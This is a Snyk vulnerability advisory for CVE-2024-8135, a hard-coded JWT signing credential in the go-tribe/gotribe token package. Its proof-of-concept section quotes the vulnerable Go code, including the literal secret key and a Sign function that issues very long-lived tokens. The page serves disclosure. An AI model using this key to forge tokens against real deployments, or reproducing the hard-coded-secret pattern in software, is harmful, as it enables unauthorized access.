Use of Hard-coded Credentials Affecting github.com/go-tribe/gotribe/pkg/token package, versions *
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.25% (66th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-GOLANG-GITHUBCOMGOTRIBEGOTRIBEPKGTOKEN-7830478
- published 25 Aug 2024
- disclosed 24 Aug 2024
- credit gtqbhksl
Introduced: 24 Aug 2024
CVE-2024-8135 Open this link in a new tabHow to fix?
A fix was pushed into the master branch but not yet published.
Overview
Affected versions of this package are vulnerable to Use of Hard-coded Credentials in the token.go component. An attacker can use the Sign function and gain unauthorized access by manipulating the config.key argument, which results in exploiting the hard-coded credentials.
PoC
var (
config = Config{"Rtg8BPKNEf2mB4mgvKONGPZZQSaJWNLijxR42qRgq0iBb5", "identityKey"}
once sync.Once
)
...........
...........
// Sign 使用 jwtSecret 签发 token,token 的 claims 中会存放传入的 subject.
func Sign(identityKey string) (tokenString string, err error) {
// Token 的内容
token := jwt.NewWithClaims(jwt.SigningMethodHS256, jwt.MapClaims{
config.identityKey: identityKey,
"nbf": time.Now().Unix(),
"iat": time.Now().Unix(),
"exp": time.Now().Add(100000 * time.Hour).Unix(),
})
// 签发 token
tokenString, err = token.SignedString([]byte(config.key))
return
}